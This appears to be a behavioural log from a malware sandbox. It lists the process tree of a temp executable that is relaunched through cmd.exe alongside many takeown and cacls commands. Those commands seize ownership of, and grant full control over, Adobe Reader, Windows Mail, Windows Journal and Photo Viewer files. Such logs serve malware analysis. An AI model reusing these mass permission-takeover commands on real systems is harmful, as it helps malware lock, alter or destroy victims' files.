C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "device.png" -nobanner1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "device.png" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "watermark.png" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "CP1257.TXT" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1257.TXT" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CENTEURO.TXT" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "can.fca" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Identity-H" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "reviews_super.gif" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Music.jtp" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Music.jtp" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PDIALOG.exe" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDIALOG.exe" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MyriadCAD.otf" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui"1⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17223285811777019102819485533-169841653152760284096178580817068424531709181806"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "can32.clx" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ZY______.PFB" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "TURKISH.TXT" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "server_ok.gif" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "server_ok.gif" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "directories.acrodata" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"2⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1254.TXT" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "zdingbat.txt" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "pmd.cer" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "pmd.cer" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "warning.gif" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "submission_history.gif" -nobanner2⤵
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "942326955300334877-961701386-1050554577-1927516376-2646614948864813841562733347"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "forms_distributed.gif" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "review_email.gif" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "bl.gif" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Genko_2.jtp" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "qmgr0.dat" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "qmgr0.dat" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "background.png" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "overlay.png" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "overlay.png" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-839890057-2089204058-1717933921-1127463696182404169-187986177852621083-1675297953"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ImagingDevices.exe" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "CP1258.TXT" -nobanner1⤵
-
